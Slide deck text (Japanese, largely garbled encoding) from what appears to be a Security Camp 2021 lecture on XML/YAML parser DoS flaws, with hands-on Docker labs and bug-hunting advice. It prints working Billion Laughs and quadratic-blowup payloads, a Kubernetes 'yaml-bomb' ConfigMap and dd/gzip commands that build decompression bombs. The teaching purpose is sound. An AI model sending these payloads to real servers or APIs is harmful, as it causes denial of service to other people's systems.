
    $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/billion-laughs $ cd etree $ docker build . -t billion-laughs-etree $ docker run billion-laughs-etree

  115. Өڹ͸ϥΠϒϥϦͦΕͧΕ w 9.-Λύʔε͢Δ࣮૷͕ͦΕͧΕҟͳΔͨΊӨڹ౓߹͍΋ҟͳΔ w FUSFFʹ͸࠷ߴʹࢗ͞Δʂ  #JMMJPO-BVHITΛࢼ͢

  116. ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM

    w %FDPNQSFTTJPO#PNC  ΠϚίί

  117. 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO w #JMMJPO-BVHITʹࣅ͍ͯΔ w ೖΕࢠʹͳͬͨ&OUJUZΛ࢖༻͢ΔͷͰ͸ͳ͘ɺ਺ઍจࣈͷจࣈྻΛද͢େ͖ͳ &OUJUZΛ܁Γฦ͠ෳ੡ͯ͠ϝϞϦফඅΛૂ͏ w ,#ఔ౓ͷ9.-ϑΝΠϧͰɺ.#͔Β਺(#ͷϝϞϦΛফඅͤ͞ΒΕΔ  9.-ʹΑΔ%P4߈ܸ

  118. 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO w ڊେͳจࣈྻʢ"""""""""""""""ʜʣ͕ೖͬͨΤϯςΟςΟʢYʣΛ ෳ਺ճݺͼग़͢͜ͱͰലେͳϝϞϦফඅΛૂ͏ w ࢦ਺ؔ਺తʹϝϞϦফඅྔ͕૿େ͢Δ#JMMJPO-BVHIT΄Ͳޮ཰తͰ͸ͳ͍ w ਂ͍ೖΕࢠʹͳͬͨΤϯςΟςΟΛېࢭ͢ΔύʔαͷରࡦΛ͢Γൈ͚ΒΕΔ  <?xml

    version="1.0"?> <!DOCTYPE DoS [ <!ENTITY x "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(লུ)"> ]> <DoS>&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;(লུ)</DoS> 9.-ϑΝΠϧྫ

  119. 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO 9.-ϑΝΠϧྫ w ڊେͳจࣈྻΛද͢ͷͰ9.-ϑΝΠϧͦͷ··Λจࣈྻͱͯ͠ѻ͏ΑΓ ίʔυதͰ9.-ϑΝΠϧΛ૊ΈཱͯΔ΄͏͕ѻ͍΍͍͢  size = 55000 entity

    = 'A' * size refs = '&x;' * size data = '''\ <?xml version="1.0"?> <!DOCTYPE DoS [ <!ENTITY x "{entity}"> ]> <DoS>{entityReferences}</DoS> '''.format(entity=entity, entityReferences=refs)

  120. ༗ޮͳ1ZUIPOϥΠϒϥϦ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO

  121. 2VBESBUJDCMPXVQFOUJUZFYQBOTJPOΛࢼ͢  ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ 2VBESBUJDCMPXVQΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ  w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞

    $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/quadratic-blowup/ $ cd etree $ docker build . -t quadratic-blowup-etree $ docker run quadratic-blowup-etree

  122. ଞͷύʔαͰ΋͍͚ΔͷͰ͸🤔ʁ w #JMMJPO-BVHIT2VBESBUJDCMPXVQFOUJUZFYQBOTJPO͸9.-ϑΝΠϧ͕ ࣋ͭࢀরػೳΛѱ༻͢Δ੬ऑੑ w ଞʹಉ༷ͷػೳ͕͋ΔϑΝΠϧ͕͋Ε͹ಉ͡ςΫ͕࢖͑ͦ͏🤔ʂʁ 

  123. #JMMJPO-BVHIT :".-ύʔαʹ΋༗ޮ  w #JMMJPO-BVHITΛࢼߦ͢Δ:".-ϑΝΠϧ lol1: &lol1 "lol" lol2: &lol2

    [*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1] lol3: &lol3 [*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2] lol4: &lol4 [*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3] lol5: &lol5 [*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4] lol6: &lol6 [*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5] lol7: &lol7 [*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6] lol8: &lol8 [*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7] lol9: &lol9 [*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8] lol10: &lol10 [*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9]

  124. #JMMJPO-BVHIT LTͰͷ࣮ྫ  w ,VCFSOFUFT"1*αʔόʢLTJPLVCFSOFUFTQLHBQJTFSWFS  ʣʹ ࡉ޻ͨ͠:".-ϑΝΠϧΛૹ৴͢Δͱ#JMMJPO-BVHIT͕ى͜Δ੬ऑੑ w $7&

    w IUUQTHJUIVCDPNLVCFSOFUFTLVCFSOFUFTJTTVFT

  125. #JMMJPO-BVHIT LTͰͷ࣮ྫ  w IUUQTHJUIVCDPNLVCFSOFUFTLVCFSOFUFTJTTVFTΑΓൈਮ apiVersion: v1 data: a: &a

    ["web","web","web","web","web","web","web","web","web"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] kind: ConfigMap metadata: name: yaml-bomb namespace: default

  126. 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO :".-ύʔαʹ΋༗ޮ  w #JMMJPO-BVHITʹࣅͨ2VBESBUJDCMPXVQ΋ಉ͘͡༗ޮ w :".-ύʔαͰͷ2VBESBUJDCMPXVQʹରͯ͠ݴٴ͍ͯ͠Δจݙ͸ ͳ͔ͥݟ͔ͭΒͳ͍🤔 w ਂ͍ೖΕࢠʹͳͬͨΤϯςΟςΟΛېࢭ͢ΔύʔαͷରࡦΛ

    ͢Γൈ͚ΒΕΔʢ͸ͣʣ w ֤ϥΠϒϥϦͷରࡦͷࠩҟ·ͰௐࠪͰ͖ͯͳ͍͕ɺ 9.-ύʔαͱಉ͘͡#JMMJPO-BVHIT͸ແޮԽ͞Ε͍ͯΔ͚ΕͲɺ 2VBESBUJDCMPXVQ͕༗ޮͳϥΠϒϥϦ΋͋Γͦ͏ʢଟ෼ʣ

  127. 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO :".-ύʔαʹ΋༗ޮ  w 2VBESBUJDCMPXVQΛࢼߦ͢Δ:".-ϑΝΠϧ w Πϯλʔωοτ্ʹ1P$͕ͳ͍ʢଟ෼ʣͷͰࣗ෼Ͱॻ͖·ͨ͠ʂ lol1: &lol1 “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(লུ)AAAAAAAAAAAAAAAA”

    lol2: &lol2 [*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,(লུ),*lol1]

  128. ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ :".-ύʔαͰࢼ͢ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1Z:".-ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ #JMMJPO-BVHITΛࢼߦ͢Δ:".-ϑΝΠϧΛॲཧ͢Δ  w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞ 

    $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/yml-parser $ cd etree $ docker build . -t billion-laughs-etree $ docker run billion-laughs-etree

  129. ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM

    w %FDPNQSFTTJPO#PNC  ΠϚίί

  130. &YUFSOBMFOUJUZFYQBOTJPO 99&ͷҰछ w Α͘஌ΒΕ͍ͯΔλΠϓͷ99& w ઌ΄Ͳղઆͨ͠΋ͷͱಉ༷ͳͷͰ͜͜Ͱ͸ղઆΛׂѪ 

  131. %5%3FUSJFWBM w ͜Ε΋99&ͷҰछ w υΩϡϝϯτλΠϓͷࢦఆΛϩʔΧϧύε΍63-Λ࢖ͬͯߦ͑ΔͨΊ ࢦఆ͞Εͨ৔ॴʹ͋Δ৘ใΛऔಘͰ͖Δ  99&ͷҰछ <?xml version="1.0"

    encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head/> <body>text</body> </html>

  132. ༗ޮͳ1ZUIPOϥΠϒϥϦ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM &YUFSOBMFOUJUZFYQBOTJPO%5%3FUSJFWBM

  133. &YUFSOBMFOUJUZFYQBOTJPOΛࢼ͢  ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ &YUFSOBMFOUJUZFYQBOTJPOΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ  w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞

    $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/external-entity-expansion/ $ cd pulldom/python3.7.0 $ docker build . -t external-entity-expansion-pulldom $ docker run external-entity-expansion-pulldom

  134. ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM

    w %FDPNQSFTTJPO#PNC  ΠϚίί

  135. %FDPNQSFTTJPO#PNC ѹॖ͞ΕͨϑΝΠϧʹΑΔ%P4 w ల։͢ΔͱڊେͳαΠζʹͳΔѹॖ͞ΕͨϑΝΠϧΛૹΔ͜ͱͰɺ σΟεΫ༰ྔͷѹഭΛૂ͏߈ܸख๏ w ѹॖ͞Εͨ9.-ετϦʔϜΛղੳͰ͖Δ9.-ϥΠϒϥϦ͕ର৅ʹͳΔ w ೔ຊޠͰ͸ߴѹॖϑΝΠϧര஄ɺ;*1ര஄ͱݺ͹Ε͍ͯΔ 

    $ dd if=/dev/zero bs=1M count=1024 | gzip > zeros.gz # bs*count=1GB $ dd if=/dev/zero bs=1M count=1024 | lzma -z > zeros.xy # bs*count=1GB $ ls -sh zeros.* 1020K zeros.gz #શͯ0ͳͷͰѹॖ཰͕ߴ͍ 148K zeros.xy #શͯ0ͳͷͰѹॖ཰͕ߴ͍

  136. ༗ޮͳ1ZUIPOϥΠϒϥϦ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM %FDPNQSFTTJPO#PNC

  137. %FDPNQSFTTJPO#PNCʜ  ԋशͳ͠ʜ w ҆શʹԋशΛ΍ͬͯ΋Β͏ͷ͕೉͍͠ͷͰ࢒೦ͳ͕Βԋश͸ͳ͍Ͱ͢ʜ

  138. ͜͜·Ͱͷ·ͱΊ w 9.-ʹ͸ଟछଟ༷ͳ߈ܸςΫ͕͋ΔͷͰɺઃఆϑΝΠϧʹ͸+40/ͳͲΛ ࢖͏ํ͕͍͍ w ٯʹ੬ऑੑΛ୳ཱ͢৔͔ΒݟΔͱ9.-ϑΝΠϧΛύʔε͢Δ෦෼͸ૂ͍໨ w 9.-ϥΠϒϥϦຖʹ༗ޮͳ੬ऑੑ͕ҧ͏ͷ͸1ZUIPOʹݶͬͨ͜ͱͰ͸ͳ͍ w ڵຯ͕͋Ε͹ଞͷݴޠͷ΋ͷ΋ௐ΂ͯΈ͍ͯͩ͘͞

    

  139. ୈ̐ষ (JU)VCΛ࢖ͬͨόάϋϯτํ๏

  140. ϥΠϒϥϦຖͷ੬ऑੑΛ஌ͬͨޙ͸ʜ (JU)VCΛ࢖ͬͨόάϋϯτํ๏ w ಛఆͷϥΠϒϥϦΛ࢖༻͍ͯ͠ΔίʔυΛ͍͔ʹ୳͔͢ w (JU)VCͷػೳΛ׆༻͢Δͱݟ͚ͭΒΕΔ w 5PQJDػೳ w ίʔυݕࡧػೳ

    w ίϛοτݕࡧػೳ w JTTVFݕࡧػೳ 

  141. Ұ෦ࣗओن੍😢 

  142. ԋश੬ऑੑ͕͋Δ044Λ୳͢ʢ͕࣌ؒ͋Ε͹ʣ w ࢒Γ͕࣌ؒ͋Ε͹΍ͬͯ΋Β͏ w ͳ͔ͬͨΒऴΘΔ 

  143.  IUUQTPXBTQPSHXXXQEGBSDIJWF08"41/;9.-%BOHFSPVTQEG

  144. ࠶ܝ੬ऑੑΛൃݟͨ͠ޙ͸ใࠂʂ  IUUQTJTFDWVMGPSNJQBHPKQJQBWVMNBJOJOEFYIUNM

  145. ஫ҙࣄ߲  w ଟ෼ɺ͋Δఔ౓ελʔ͕͍͍ͭͯΔ(JU)VCϦϙδτϦͰͳ͍ͱରԠͯ͠΋Β ͑ͳ͍

  146. ୈ̑ষ ٕज़ͱ޲͖߹͏࢟੎ͷ࿩

  147. ੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w 9.-ύʔαʹؔ͢Δ੬ऑੑʹৄ͘͠ͳͬͨͷ͸"OESPJE.BOJGFTUYNMΛ ύʔε͢ΔίʔυΛॻ͍ͨͷ͕͖͔͚ͬ w ੩తղੳπʔϧʹࣗ෼͕ॻ͍ͨίʔυΛೖྗͨ͠Β੬ऑੑ͕͋ͬͨ w 1ZUIPOͷ9.-ϥΠϒϥϦ͸σϑΥϧτͰ੬ऑͰͦΕͧΕ༗ޮͳ੬ऑੑ͕ҟͳ Δ͜ͱΛ஌ͬͨ 

  148. ੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w ίʔυΛॻ࣌͘ʹࣗ෼͕ॻ͍ͨίʔυʹ੬ऑੑ͕ͳ͍͔֬ೝ͢Δ͜ͱͰ ੬ऑੑΛͳ͘͠ɺηΩϡϦςΟͷ஌ࣝ΋਎ʹͭ͘ w ։ൃͷܦݧΛੵΈͳ͕ΒɺηΩϡϦςΟͷ஌ݟ΋ߴΊΒΕΔ w ͦͯ͠ಘͨ஌ࣝͰόάϋϯτ͢Δͱ$7&ΛऔಘͰ͖ͨΓɺใ঑ۚΛ໯ͬͨΓ Ͱ͖Δ͔΋ʜʂʂʂ 

  149. ੬ऑੑΛҙࣝͯ͠ΤϯδχΞϦϯάʹऔΓ૊Ή w ηΩϡϦςΟɾΩϟϯϓʹࢀՃ͔ͨ͠Βͱ͍ͬͯશһ͕ηΩϡϦςΟͷಓʹ ਐΉ༁Ͱ͸ͳͯ͘։ൃଆͷಓΛาΜͰ͍͘ਓ΋͍Δ w ηΩϡϦςΟͷ஌ࣝ͸ηΩϡϦςΟΤϯδχΞͱͯ͠΍͍ͬͯ͘ʹ΋ ։ൃଆͷΤϯδχΞͱͯ͠΍͍ͬͯ͘ʹ΋໾ཱͭ w ࠓޙηΩϡϦςΟɾΩϟϯϓͰֶΜͩ஌ࣝͷ͏ͪԿ͔͕໾ཱͯͯ͘ΕΔͱ ͏Ε͍͠Ͱ͢

    

  150.